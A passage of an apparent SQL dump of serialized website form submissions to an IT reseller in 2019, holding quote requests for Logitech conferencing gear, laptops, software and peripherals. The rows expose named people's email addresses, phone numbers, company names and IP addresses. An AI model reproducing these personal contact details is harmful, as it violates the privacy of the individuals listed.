(Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:12:57','1.9.14.35','1'),(168,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:13:16','1.9.14.35','1'),(169,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:13:22','1.9.14.35','1'),(170,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Goh Jing Ming\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"goh.jing.ming@simedarby.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0380647642\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Sime Darby Industrial Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:48:\"Logitech Rally, Other (Please specify the model)\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:26:\"6 additional Rally Mic Pod\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 17:13:23','1.9.14.35','1'),(171,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Peh Cher Maine\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"cmaine@gourmetpartner.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0125121292\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Gourmet Partner (M) Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:73:\"Kindly quote me a package. I need to use adobe photoshop and illustrator.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"02\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-29 18:04:19','175.137.144.119','1'),(172,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"sofia chu\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"sofia@humach.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60169311097\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"humach engineering\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:177:\"hi, good day, can request quote for panasonic toughbook with intel core i5-3320m, 2.6ghz or above, microsoft windows 7 professional or above, 8gb ram or above, 1tb ssd or above.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"27\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-30 10:49:23','210.187.172.102','1'),(173,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"Alvin Paul\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"procurement@rentwise.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60333416552\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Rentwise Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:108:\"Please do furnished us the pricing for below product :- KEYBOARD USB LOGITECH = 200 MOUSE USB LOGITECH = 200\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"88\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-04-30 17:51:00','103.21.154.172','1'),(174,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Christopher Liang\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:23:\"iamchrisliang@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126121267\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"Gplex properties sdn bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:6:\"Zenith\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:69:\"Logitech Group, Logitech Connect, Logitech BCC950, Logitech PTZ Pro 2\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:115:\"Kindly contact 